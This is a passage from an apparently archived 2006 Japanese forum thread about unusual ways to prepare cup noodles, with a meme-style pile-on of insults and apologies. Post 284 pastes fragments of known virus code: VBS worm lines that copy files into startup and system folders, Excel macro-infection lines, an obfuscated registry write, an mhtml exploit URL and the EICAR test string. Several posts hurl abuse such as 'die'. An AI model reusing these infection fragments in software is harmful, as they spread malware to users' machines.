・使うのはスタンダードな日清カップラーメン。
・牛乳
・池の水
・石鹸水
・濾過した雨水
・養命酒

…などなどでやってた。まだ他にもあったが忘れたが、一つ一つに☆マークで味評価つきだった。

わりとサイズの小さい本だったかな…探してるんだが見つからないので、誰か知ってる人いたら詳細きぼん

153 :すぐ名無し、すごく名無し:2006/07/25(火) 10:29:36 ID:+2eiQ1NE.net
>>152
これか?
>>38
  http://members.ytv.home.ne.jp/cupmen/

154 :すぐ名無し、すごく名無し:2006/07/25(火) 12:18:36 ID:OzcVNHFb.net
>>107
お笑いいいね。


155 :すぐ名無し、すごく名無し:2006/07/27(木) 23:37:44 ID:UZpWMqPL.net
koi2氏か・・・
何もかも皆懐かしい


156 :すぐ名無し、すごく名無し:2006/07/31(月) 15:43:46 ID:mqtP/m1t.net
>>107
お笑いカップヌードル

157 :すぐ名無し、すごく名無し:2006/08/21(月) 22:59:07 ID:lhRIuH7w.net
420 名無しさん@6周年 sage New! UN 2006/08/21(月) 10:26:21 ID:dnTHv2550
カップヌードルと言えば、昔大学にいたフランスからの留学生を初めて寮近くのスーパーに連れてったら、
いろんなカップヌードルの山に『!!』て目を見開いて、その後ボワワーとばかりに泣き出したのよ。
ボワワーと。
彼はアフリカ某国出身で(国名は忘れたw)、内戦だかなんだかで一家は難民生活を与儀なくされて。
で遠戚のツテでフランスにたどりつき、国籍も取って、親の努力もあって本人は日本に留学までできるようになったんだが、
難民キャンプ時代、ひもじさを満たしてくれたのが支援物資の中のカップヌードルだったんだと。

『今は経済的にも余裕がある暮らしをしてるが、今の自分たちがあるのもあの頃のカップヌードルのおかげなんだ』
って泣き泣き話してくれた。

ちなみに本人は日本に留学するほどなのに、なぜかカップヌードルが日本発祥とは普段意識してなくて、
特殊な支援物資だと信じこんでたんだって。
今は割と世界中で売られてるはずだけど、なにせ昔なんでまだフランスでは目にしなかったのかも。
それからは完全にカップヌードルにはまってしまい、よく自室でカップヌードルパーティしてたよw
しお味がお気に入りだったなあ(トリビアでもあったね)

去年だったか、カップヌードルのCMでロシアの宇宙ステーションでカップヌードル食べるCMあったでしょ。
『No Border』てやつ。
あれ見るとやつのこと思い出してたよ。

158 :すぐ名無し、すごく名無し:2006/08/24(木) 00:41:51 ID:4hEZtkGq.net
>>107
見たらカップラーメンがうま

159 :すぐ名無し、すごく名無し:2006/08/24(木) 20:09:31 ID:yDmJD71j.net
シーフードにお湯を入れたらすぐに冷蔵庫に入れる
冷まして食う ウマ−
カップ焼きそばに納豆を入れて食う ウマ−

160 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:16 ID:ay9fC3/C.net
>>159
(゚д゚)マズー

161 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:16 ID:4Tn73xxH.net
>>159

はぁ?舌検査しろ

162 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:20 ID:RdFB2oeC.net
>>159
うまいわけねぇだろ氏ねカス

163 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:20 ID:kfiCUTim.net
>>159
嘘だっ!!

164 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:22 ID:Y58O25Vt.net
>>159
( ゚Д゚)ハァ?病院逝けよ。

165 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:22 ID:OR8KyHvA.net
>>159
カップやきそばに納豆とか、おまえ基地害だろ?

166 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:23 ID:eb9IOVk1.net
>>159
きめぇよ氏ね

167 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:25 ID:KZBYLiXr.net
>>159
美味くねーよカス

168 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:25 ID:mv4ASuth.net
>>159
ねーよwww

169 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:25 ID:Ydd3qQVO.net
>>159
きめぇwwwwwww

170 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:27 ID:zio9BHRI.net
>>159
それはないだろ

171 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:27 ID:7C6mjYyC.net
>>159
うまくねぇよボケ

172 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:30 ID:EdCVNQv4.net
>>159
そんま不味そうな食べ方できるか

173 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:31 ID:mCGL2VlW.net
>>159
ちょwwwwwwwwわざわざ生ゴミ作って食うなよwwwwwwwwwwwwwwwwwwwww

174 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:33 ID:7N2NB+s9.net
>>159
このドブネズミが!

175 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:34 ID:u0ZSbdzc.net
>>159
それはどう考えても無い

176 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:37 ID:lTS/xXAd.net
>>159
食えるかバカ!

177 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:38 ID:gbSZUQet.net
>>159
そんなのが旨いわけないだろwwwwwwwwww
味覚障害かよwwwwww

178 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:40 ID:gLkfg+Id.net
>>159
発想がきめーんだよカス^^

179 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:42 ID:6AmDOh5G.net
>>159いや、めっちゃ普通だろw馬鹿?

180 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:44 ID:NcaqK3Yi.net
>>159
さすがの俺でもそれは引くわ

181 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:44 ID:IXIRjOoW.net
>>159
ウマーじゃねえよカス

182 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:46 ID:7ITFpHZw.net
>>159
舌がいかれてるな

183 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:46 ID:agtXdGBS.net
>>159
吐いた

184 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:47 ID:d2FZ/GAw.net
>>159
それはねーよwwwwwwwwww
普通冷凍庫に入れるだろwwwwwwwwwwww

185 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:48 ID:GNx8d1fv.net
>>159
うまくねえ

186 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:52 ID:TJSI9j+a.net
>>159
それはないな

187 :すぐ名無し、すごく名無し:2006/08/24(木) 20:34:57 ID:Xsi3olcY.net
>>159
おぇ

188 :すぐ名無し、すごく名無し:2006/08/24(木) 20:35:04 ID:tidlFSRc.net
>>159
それはない

189 :すぐ名無し、すごく名無し:2006/08/24(木) 20:35:08 ID:lw+T4ui1.net
>>159
それはない

190 :すぐ名無し、すごく名無し:2006/08/24(木) 20:35:15 ID:mTM0Ist/.net
>>159
なにが得意げにウマーだ
ウマーだよカス

この味覚障害者

191 :すぐ名無し、すごく名無し:2006/08/24(木) 20:35:22 ID:NoxsOyQN.net
>>159
なんでホタルすぐ死んでしまうん?

192 :すぐ名無し、すごく名無し:2006/08/24(木) 20:35:22 ID:1nuRMYVb.net
>>159
お前死ねよ

193 :すぐ名無し、すごく名無し:2006/08/24(木) 20:35:27 ID:YrYLrPFf.net
>>159
あ…ないない!

194 :すぐ名無し、すごく名無し:2006/08/24(木) 20:35:34 ID:2MtwjA/S.net
>>159
冷まして食うなんておかしーだろ

195 :すぐ名無し、すごく名無し:2006/08/24(木) 20:35:36 ID:iNb+lBJd.net
>>159
なにこのリアルDQN?

196 :すぐ名無し、すごく名無し:2006/08/24(木) 20:36:00 ID:ULzZH9AX.net
>>159
考えただけでで気分悪くなってくる

197 :すぐ名無し、すごく名無し:2006/08/24(木) 20:36:06 ID:XheBjxuw.net
>>159
糞まじーよwwwwwwwwww
俺のカップめん返せ馬鹿

198 :すぐ名無し、すごく名無し:2006/08/24(木) 20:36:23 ID:5HMCKfr+.net
>>159
素で病院行って検査してもらえ。マジで

199 :すぐ名無し、すごく名無し:2006/08/24(木) 20:36:37 ID:vmDe8UXB.net
     ;:;:;              ,、-ー-、              ど
     ;:;:            ,r'"´ ̄`ヾ、             暑  う
     ;:;:.            リ ,,, ニ ,,,_ ヾト、            ゅ  だ
     :;:;:;.            ,ハ{0} /¨`ヽ{0!.:.\          い
     ;:;:;:           /.:.:.V,r''''''ゞyイ.:.:.:.:..ヽ        だ
     ;:;:.         ノ.:!:.:.:.:`ゞ-<7.:〉.:.:.:i.:.:}       ろ
     从 __  _,,,/.:.:/:.:.:.:.:.:| }-{/i.:/.:.:.:.:|.:/        う
      从从百円}と_」.:/!.:.:.:.:.:.:.!  ̄ リ.:.:.:.:.:り    
         ̄ ̄    ̄  |.:.:.:.:.:./_ :__ヽ.:.:.:.:\
                \/.:.::..:.:.:.:.:.:..:\:.::./
                /.:.:.:.:.:.:.「^Y.:.:.:.:.:.:|´
                 {.:.:.:.:.:.:.:.| ,!.:.:.:.:.:.:|
     __           \.:.:.:.:.:.V.:.:.:.:.:.:.:|
    /.:.:./ンく";;〕        \.:.:.::|.:.:.:.:.:.:.:!
    ヽ;::/::::::....;;;ヽ、       > 'ゝ─‐イ、
     ヾ;;;;;;;;:::...;;;;〈       `ー' ``''ー‐'
      ‘ー.く`ヽイュ、 
         ソ´・ ̄ス_      お 暗 :::::::::::::::::::::
        ./ ・ ・、√: : : ヽ   ら 寺  く :::::::::::::::::::::::
         >.= イ: : : : : ;_;|  な が  て ::::::::::::::::::::::
      /l_"/( ヽ}: : : : .]  い わ   :::::::::::::::::::::::::
      `ー――` \ : : : イ  わ か :::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


200 :すぐ名無し、すごく名無し:2006/08/24(木) 20:47:32 ID:yDmJD71j.net
もうしません・・・・。

201 :すぐ名無し、すごく名無し:2006/08/24(木) 20:48:07 ID:Jmhn7oYk.net
>>159
それはないだろ

202 :すぐ名無し、すごく名無し:2006/08/24(木) 20:49:54 ID:u0ZSbdzc.net
>>200
25の倍数に貼られたスレにいってひたすら否定するスレ
http://ex16.2ch.net/test/read.cgi/news4vip/1156416738/159

203 :すぐ名無し、すごく名無し:2006/08/24(木) 20:50:24 ID:u0ZSbdzc.net
25の倍数に貼られたスレにいってひたすら否定するスレ
http://ex16.2ch.net/test/read.cgi/news4vip/1156416738/300
だった

204 :すぐ名無し、すごく名無し:2006/08/24(木) 20:58:15 ID:d2FZ/GAw.net
>>200それはねーよ

205 :すぐ名無し、すごく名無し:2006/08/24(木) 20:59:23 ID:OCw970N5.net
>>200
。・゚・(ノд`)・゚・。 ゴメンナサイ

206 :すぐ名無し、すごく名無し:2006/08/24(木) 20:59:24 ID:mTM0Ist/.net
>>200
ごめんよ
本当はうまいの知ってたんだけど、先にいわれちゃったからイラついた
俺は最低だった ほんとごめん

207 :すぐ名無し、すごく名無し:2006/08/24(木) 21:00:00 ID:NybR1VP6.net
>>200
スマソ。食い方はひとそれぞれだ

208 :すぐ名無し、すごく名無し:2006/08/24(木) 21:00:04 ID:tRSZuuJj.net
>>200
(;ω;`)ヽ(・ω・` )

209 :すぐ名無し、すごく名無し:2006/08/24(木) 21:00:16 ID:JHrKoAR/.net
>>200お前が作ったものは何でもうまいさ

210 :すぐ名無し、すごく名無し:2006/08/24(木) 21:00:25 ID:7kHBtd5K.net
>>200
俺もカップ焼きそばに納豆入れて食うから・・

211 :すぐ名無し、すごく名無し:2006/08/24(木) 21:01:02 ID:Ydd3qQVO.net
>>200
こんど俺も作ってみるよ・・(;ω;`)

212 :すぐ名無し、すごく名無し:2006/08/24(木) 21:02:00 ID:yDmJD71j.net
じゃ今夜食べよーっと! ウマ−

213 :すぐ名無し、すごく名無し:2006/08/24(木) 21:02:45 ID:s4TK4MVc.net
>>200
俺も今度食ってみるから…な?

214 :すぐ名無し、すごく名無し:2006/08/24(木) 21:02:55 ID:NybR1VP6.net
>>212
調子のんなお(´・д・`)

215 :すぐ名無し、すごく名無し:2006/08/24(木) 21:03:09 ID:ay9fC3/C.net
>>200
作ってみたけど結構うまかった(;つД`)

216 :すぐ名無し、すごく名無し:2006/08/24(木) 21:03:17 ID:Ydd3qQVO.net
>>212
はぁ?

217 :すぐ名無し、すごく名無し:2006/08/24(木) 21:03:24 ID:ULzZH9AX.net
>>212
なんですぐ調子に乗るの?

218 :すぐ名無し、すごく名無し:2006/08/24(木) 21:03:42 ID:JHrKoAR/.net
>>212 ずにのるな

219 :すぐ名無し、すごく名無し:2006/08/24(木) 21:03:51 ID:7kHBtd5K.net
>>212
ちょっと下手に出るとこれかよ!

220 :すぐ名無し、すごく名無し:2006/08/24(木) 21:03:52 ID:OCw970N5.net
>>212
(#゚Д゚)

221 :すぐ名無し、すごく名無し:2006/08/24(木) 21:04:00 ID:Oig1uNYQ.net
>>212
みんなお前のこと臭いってよ

222 :すぐ名無し、すごく名無し:2006/08/24(木) 21:04:00 ID:eb9IOVk1.net
>>212
またそうやってすぐ調子に乗りやがる

223 :すぐ名無し、すごく名無し:2006/08/24(木) 21:04:01 ID:u0ZSbdzc.net
>>212
いや、美味そうには思わない

224 :すぐ名無し、すごく名無し:2006/08/24(木) 21:04:10 ID:mTM0Ist/.net
>>212
だからウマーじゃなくてウマーだっていってるべ?
おまえやっぱキチガイだわ

225 :すぐ名無し、すごく名無し:2006/08/24(木) 21:04:33 ID:OR8KyHvA.net
>>212
ちゃんと病院行った方がいいって。舌大丈夫?

226 :すぐ名無し、すごく名無し:2006/08/24(木) 21:04:36 ID:1nuRMYVb.net
>>212
死ねよ

227 :すぐ名無し、すごく名無し:2006/08/24(木) 21:04:55 ID:ay9fC3/C.net
>>212
つ病院

228 :すぐ名無し、すごく名無し:2006/08/24(木) 21:05:03 ID:4Tn73xxH.net
あーもう殺

229 :すぐ名無し、すごく名無し:2006/08/24(木) 21:05:09 ID:GNx8d1fv.net
>>212
もう無理

230 :すぐ名無し、すごく名無し:2006/08/24(木) 21:05:11 ID:s4TK4MVc.net
>>212
おまえばっかじゃねーの?(笑

231 :すぐ名無し、すごく名無し:2006/08/24(木) 21:05:18 ID:Zmrnt9B2.net
>>212
不謹慎なやつだなw

232 :すぐ名無し、すごく名無し:2006/08/24(木) 21:05:36 ID:d2FZ/GAw.net
>>212
はあ?

233 :すぐ名無し、すごく名無し:2006/08/24(木) 21:05:45 ID:mXWGaESp.net
>>212おまえには失望した

234 :すぐ名無し、すごく名無し:2006/08/24(木) 21:06:08 ID:EQr1dNYm.net
>>212
なんでそうなるんだ!

235 :すぐ名無し、すごく名無し:2006/08/24(木) 21:06:08 ID:XheBjxuw.net
>>212
死ね

236 :すぐ名無し、すごく名無し:2006/08/24(木) 21:06:36 ID:Ydd3qQVO.net
>>212
またすぐすぐそうやって・・・

237 :すぐ名無し、すごく名無し:2006/08/24(木) 21:06:58 ID:iNb+lBJd.net
>>212
ゴミクズ

238 :すぐ名無し、すごく名無し:2006/08/24(木) 21:07:29 ID:+GznDeoh.net
>212
死ねばいいのに

239 :すぐ名無し、すごく名無し:2006/08/24(木) 21:07:59 ID:gDYZ9FmA.net
>>212
何が邪道だカス

240 :すぐ名無し、すごく名無し:2006/08/24(木) 21:08:34 ID:7N2NB+s9.net
>>212
糞でも食ってろ

241 :すぐ名無し、すごく名無し:2006/08/24(木) 21:08:50 ID:yDmJD71j.net
ほんとにもう二度とそんな食べ方しません・・・・。

242 :すぐ名無し、すごく名無し:2006/08/24(木) 21:09:24 ID:Ydd3qQVO.net
>>241
ごめん、俺が悪かった・・

243 :すぐ名無し、すごく名無し:2006/08/24(木) 21:09:35 ID:Cmb1kL9n.net
>>241
気にすんな

244 :すぐ名無し、すごく名無し:2006/08/24(木) 21:09:45 ID:GSvfTdF9.net
>>241
本当に申し訳ない・・・

245 :すぐ名無し、すごく名無し:2006/08/24(木) 21:09:53 ID:ogi6J0Vt.net
>>241
ごめんちょっと言い過ぎた

246 :すぐ名無し、すごく名無し:2006/08/24(木) 21:09:55 ID:db20n74+.net
>>241
頼むからそんなこと言わないでくれよ

247 :すぐ名無し、すごく名無し:2006/08/24(木) 21:10:03 ID:ULzZH9AX.net
>>241
俺もちょっと言い過ぎたよ・・・

248 :すぐ名無し、すごく名無し:2006/08/24(木) 21:10:13 ID:tRSZuuJj.net
>>241
ひどい( ´;ω;)(・ω・`*)ネー

249 :すぐ名無し、すごく名無し:2006/08/24(木) 21:10:15 ID:7kHBtd5K.net
>>241
ごめん・・お湯入れたシーフードなかなか冷めなくてイライラしてたんだ・・
今は反省している

250 :すぐ名無し、すごく名無し:2006/08/24(木) 21:10:16 ID:EQr1dNYm.net
>>241
君は悪くない。
むしろ叩いてるやつがおかしいくらいだ

251 :すぐ名無し、すごく名無し:2006/08/24(木) 21:10:45 ID:1nuRMYVb.net
>>241
ほんとは死ねだなんて思ってないんだからねっ!

252 :すぐ名無し、すごく名無し:2006/08/24(木) 21:10:48 ID:eb9IOVk1.net
>>241
ごめん。まじ言い過ぎたわ・・・おいしいよね
おれもこんやうまーしようかな

253 :すぐ名無し、すごく名無し:2006/08/24(木) 21:10:51 ID:OCw970N5.net
>>241
こいつらは判ってない。すげぇ旨いのにな。

254 :すぐ名無し、すごく名無し:2006/08/24(木) 21:10:54 ID:akWduxgk.net
>>241
すまんかった

255 :すぐ名無し、すごく名無し:2006/08/24(木) 21:11:06 ID:OR8KyHvA.net
>>241
ごめん、やっぱ言い過ぎたわ。許してくれ

256 :すぐ名無し、すごく名無し:2006/08/24(木) 21:11:11 ID:JHrKoAR/.net
>>241実は夕飯それなんだ

257 :すぐ名無し、すごく名無し:2006/08/24(木) 21:11:26 ID:u0ZSbdzc.net
>>241
そんなオマイが大好きさ

258 :すぐ名無し、すごく名無し:2006/08/24(木) 21:11:39 ID:ogi6J0Vt.net
>>241
本当にごめんね?

259 :すぐ名無し、すごく名無し:2006/08/24(木) 21:11:48 ID:mTM0Ist/.net
>>241
まじで言い過ぎた・・・こういう悪い癖なおさないとだめだよね

260 :すぐ名無し、すごく名無し:2006/08/24(木) 21:11:55 ID:GNx8d1fv.net
>>241
実は俺も好きなんだ。
ただ流れにのっちゃって・・・すまんかった

261 :すぐ名無し、すごく名無し:2006/08/24(木) 21:12:08 ID:qWGrrka/.net
>>241
その…なんだ、元気だせよ?
ごめんな

262 :すぐ名無し、すごく名無し:2006/08/24(木) 21:12:59 ID:Gj0n8bt3.net
うぇwwwwwwうぇwwwwwwwww

263 :すぐ名無し、すごく名無し:2006/08/24(木) 21:13:18 ID:Ydd3qQVO.net
>>241
俺もその食べ方やってみるからな?

264 :すぐ名無し、すごく名無し:2006/08/24(木) 21:15:33 ID:yDmJD71j.net
みんな解ってくれたんだね!皆とは友達になれそうだな!!

265 :すぐ名無し、すごく名無し:2006/08/24(木) 21:16:11 ID:OR8KyHvA.net
>>264
は?てめぇみたいなキモイ食べ方するやつとは友達になりたくねーよカス

266 :すぐ名無し、すごく名無し:2006/08/24(木) 21:16:23 ID:1nuRMYVb.net
>>264
は?

267 :すぐ名無し、すごく名無し:2006/08/24(木) 21:16:32 ID:u0ZSbdzc.net
>>264
なれる訳ないんだぜ?

268 :すぐ名無し、すごく名無し:2006/08/24(木) 21:16:46 ID:EQr1dNYm.net
>>264
まったく・・・・
すぐこれだよ・・・・・

269 :すぐ名無し、すごく名無し:2006/08/24(木) 21:16:56 ID:iNb+lBJd.net
>>264
はあぁ?死ねよカス

270 :すぐ名無し、すごく名無し:2006/08/24(木) 21:16:57 ID:Ydd3qQVO.net
>>264
わかんねーよ!

271 :すぐ名無し、すごく名無し:2006/08/24(木) 21:17:14 ID:ULzZH9AX.net
>>264
いい加減にしろよ屑

272 :すぐ名無し、すごく名無し:2006/08/24(木) 21:17:27 ID:GNx8d1fv.net
>>264
無理

273 :すぐ名無し、すごく名無し:2006/08/24(木) 21:17:33 ID:tRSZuuJj.net
>>264
(・ω・` )  三(*;ω;*)ノアンタトハヤッテラレマヘンワー

274 :すぐ名無し、すごく名無し:2006/08/24(木) 21:17:45 ID:ogi6J0Vt.net
>>264
どこまで調子に乗るつもりだ


275 :すぐ名無し、すごく名無し:2006/08/24(木) 21:17:57 ID:eb9IOVk1.net
>>264
まじ調子のんなよww

276 :すぐ名無し、すごく名無し:2006/08/24(木) 21:18:00 ID:G5XCWwBT.net
>>264
さすがの俺でも(AA略

277 :すぐ名無し、すごく名無し:2006/08/24(木) 21:18:23 ID:7kHBtd5K.net
>>264
いい加減にしたらどうなの?

278 :すぐ名無し、すごく名無し:2006/08/24(木) 21:18:44 ID:OCw970N5.net
>>264
(+д+)マズー

279 :すぐ名無し、すごく名無し:2006/08/24(木) 21:18:45 ID:d2FZ/GAw.net
>>264
友達とか都市伝説だぞ?

280 :すぐ名無し、すごく名無し:2006/08/24(木) 21:19:59 ID:Ydd3qQVO.net
>>279
これだから友達の少ないヤツは・・・

281 :すぐ名無し、すごく名無し:2006/08/24(木) 21:20:17 ID:CVCwWAe2.net
>>264
         _、_
      .(;^ω^)\      さすがの俺もそれは引くわ!
      | \ / \√|    
      ( ヽ√| ` ̄
      ノ>ノ  ̄
      レレ   ((


282 :すぐ名無し、すごく名無し:2006/08/24(木) 21:20:38 ID:M0Q1VRHu.net
 

       なにこの毒悪のきちがいスレッド

283 :すぐ名無し、すごく名無し:2006/08/24(木) 21:21:54 ID:OBZCJkAI.net
誘導されてきますた^^

284 :すぐ名無し、すごく名無し:2006/08/24(木) 21:22:03 ID:hlDigKGN.net
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???


285 :すぐ名無し、すごく名無し:2006/08/24(木) 21:22:08 ID:ay9fC3/C.net
次スレは?

286 :すぐ名無し、すごく名無し:2006/08/24(木) 21:22:13 ID:Ydd3qQVO.net
さぁ・・・

287 :すぐ名無し、すごく名無し:2006/08/24(木) 21:22:18 ID:OR8KyHvA.net
次スレはいらんがな

288 :すぐ名無し、すごく名無し:2006/08/24(木) 21:22:24 ID:lw+T4ui1.net
>>282
極めて健全だし

289 :すぐ名無し、すごく名無し:2006/08/24(木) 21:22:29 ID:GNx8d1fv.net
みなさんおつかれ!

290 :すぐ名無し、すごく名無し:2006/08/24(木) 21:22:30 ID:zHRumgkV.net
次はここか・・・
VIPから来ますた!

291 :すぐ名無し、すごく名無し:2006/08/24(木) 21:23:00 ID:OBZCJkAI.net
次の安価

292 :すぐ名無し、すごく名無し:2006/08/24(木) 21:23:09 ID:eb9IOVk1.net
きますた

293 :すぐ名無し、すごく名無し:2006/08/24(木) 21:23:29 ID:ay9fC3/C.net
http://ex16.2ch.net/test/read.cgi/news4vip/1156421983/

294 :すぐ名無し、すごく名無し:2006/08/24(木) 21:23:39 ID:mTM0Ist/.net
在日の粘着っぷりは異常だな
顔真っ赤にしてスレ追ってると思うとわらけてくる

295 :すぐ名無し、すごく名無し:2006/08/24(木) 21:23:51 ID:gbSZUQet.net
最後のスレとか荒らしてるだけで全然面白くなかったんだけど
次スレの誘導もさせないしカスかてめーら

296 :すぐ名無し、すごく名無し:2006/08/24(木) 21:24:36 ID:OR8KyHvA.net
ユダがわいてるんだから次スレなんてあたって冷めるだけだろカス

297 :すぐ名無し、すごく名無し:2006/08/24(木) 21:38:26 ID:SF4lrs5r.net
明日カップめんの日だと

298 :すぐ名無し、すごく名無し:2006/08/24(木) 21:52:06 ID:Thcka8Gx.net
オレも納豆ヤキソバは合うと思うよ。現に食ってるからw


299 :すぐ名無し、すごく名無し:2006/08/25(金) 07:26:51 ID:A2LbWVfB.net
>>264
御前の母ちゃん…
昨日\99ショップで店員と喧嘩してたぞ…

それと今着てるそのTシャツ一昨日も着てなかった?

え!?
その部屋で親子3人暮らしてんの?

300 :すぐ名無し、すごく名無し:2006/08/25(金) 16:33:03 ID:Pt6QLNJu.net
両親が旅先で、フォークも箸も手元になくて、歯ブラシで食べた言うてたよ。

301 :すぐ名無し、すごく名無し:2006/09/08(金) 00:54:48 ID:HzyqSPOm.net
普通に作る。3分経ったら、スープを全部捨てる。
麺と具だけでも味が十分ついてるので、普通に食える。
いつもこうして食ってる。醤油だけだが。

メリット:具をつかみやすい。すぐ冷めるので食べやすい。
デメリット:ラーメン食ってる気がしない。捨てるときに具がこぼれる。

302 :すぐ名無し、すごく名無し:2006/09/08(金) 10:39:32 ID:huvSbb9E.net
待ち時間は30秒。麺かためが旨い。

303 :すぐ名無し、すごく名無し:2006/09/10(日) 14:06:09 ID:+xdxXcZA.net
>>300 おめ
ボールペンと鉛筆で食べたことあるよ。

304 :すぐ名無し、すごく名無し:2006/09/14(木) 09:26:33 ID:dglUGaRv.net
カレーヌードルを別の容器にうつして
そこに、コンビーフ、バーモントカレー一欠けら、好みの量の炒めたニンニクを入れて
少し多めにお湯入れて、食う前に半熟卵を入れてかき混ぜて食う
残ったスープにサフランライスをぶち込んで食う


305 :すぐ名無し、すごく名無し:2006/09/15(金) 01:19:39 ID:7eADIRtq.net
シーフードヌードルにお湯入れた後で生卵入れて待つ。三分経ったら卵を麺に埋める。麺半分食べた頃には温卵風になってるから黄身を麺に絡めて食べた後で残った汁に冷や飯突っ込んで雑炊みたいにして食べる。

306 :すぐ名無し、すごく名無し:2006/09/15(金) 11:44:28 ID:iAyczzBk.net
10分くらい放置してムクムクとカップいっぱいまで増やして食べるシーフード愛してる。

307 :すぐ名無し、すごく名無し:2006/09/15(金) 14:04:17 ID:WzQpIuXX.net
カップめん根岸
【意味】:テレビの健康番組等で紹介された野菜果物肉類の健康法を実行しても長続きしない。
健康器具・食品をテレビ通販に洗脳されて買い、支払いに追われる。
健康器具は一ヶ月後にはタオルや衣類掛けに大変身。
健康に気を遣っているふうに見えるが、夜中に炭水化物・糖類・油脂類を不規則に摂取。
健康器具・食品の支払いや衣食住の支払いで残った金を競馬やギャンブルで使い果たす。
2周り以上も年下の親戚から二週間に一度は借り、スープヌードルで過ごす。
他の支払いで健康保険料も払えない本末転倒オヤジ。

308 :すぐ名無し、すごく名無し:2006/09/19(火) 17:09:24 ID:5pSYiXnX.net
シーフードを牛乳でつくるとスープスパゲッティになるって聞いて
やってみたら、マッタリしすぎて吐きそうになり途中で挫折した…

309 :すぐ名無し、すごく名無し:2006/09/25(月) 10:35:59 ID:73MwPPxZ.net
カップ麺オナニー後に食すネタを書きに来たら、三回も既出か。
俺以外にも、けっこうやってるやついるんだな。

310 :すぐ名無し、すごく名無し:2006/11/21(火) 01:33:55 ID:4anVEnhd.net
シーフードにタバスコ

311 :すぐ名無し、すごく名無し:2006/11/21(火) 02:07:37 ID:tKIx35Ii.net
>>310
俺もタバスコ入れる
カレーも酸味が合う
入れすぎると酢臭くなってイマイチだけど

312 :すぐ名無し、すごく名無し:2006/11/21(火) 03:12:28 ID:49yTV3m9.net
フランスパンにカレー味をつけたりして食べるとうまい

313 :すぐ名無し、すごく名無し:2006/12/03(日) 14:04:42 ID:Wd9hBJis.net
エエェェ(´Д`)ェェエエ

314 :すぐ名無し、すごく名無し:2006/12/03(日) 17:48:33 ID:r2KVoAjV.net
カレーヌードルのルー絶対混ぜない
これをおかずに麺を食う

315 :すぐ名無し、すごく名無し:2006/12/03(日) 19:29:31 ID:nsFZPbuN.net
透明フォークで食う

316 :すぐ名無し、すごく名無し:2006/12/04(月) 02:28:46 ID:10ktuxXb.net
中東の方はしょうゆ味にソースかけてました
なんか自国の料理の味になるらしい

317 :すぐ名無し、すごく名無し:2006/12/04(月) 07:11:46 ID:WDGvhB2x.net
ナルトとメンマとチャーシューをトッピングする

318 :すぐ名無し、すごく名無し:2006/12/05(火) 07:21:20 ID:aDxg84ec.net
カップヌードルに胡椒を入れまくるとおいしいよ

319 :すぐ名無し、すごく名無し:2006/12/05(火) 09:48:02 ID:3hskMdH5.net
豪華な器に盛ってみる

320 :すぐ名無し、すごく名無し:2006/12/05(火) 11:28:38 ID:mGWuRSEf.net
お湯を入れたらひっくり返して三分たったら戻して食べる

321 :すぐ名無し、すごく名無し:2006/12/05(火) 17:23:34 ID:tJEgiLqr.net
隠し味にトリカブト

322 :すぐ名無し、すごく名無し:2006/12/05(火) 18:11:30 ID:icFL2MK1.net
賞味期限が4ヶ月過ぎてるカップヌードルって喰っても大丈夫ですかね?
なんか容器にボツボツと斑点がでてるんですけど・・

323 :すぐ名無し、すごく名無し:2006/12/05(火) 19:38:35 ID:tJEgiLqr.net
↑それカビ(笑)

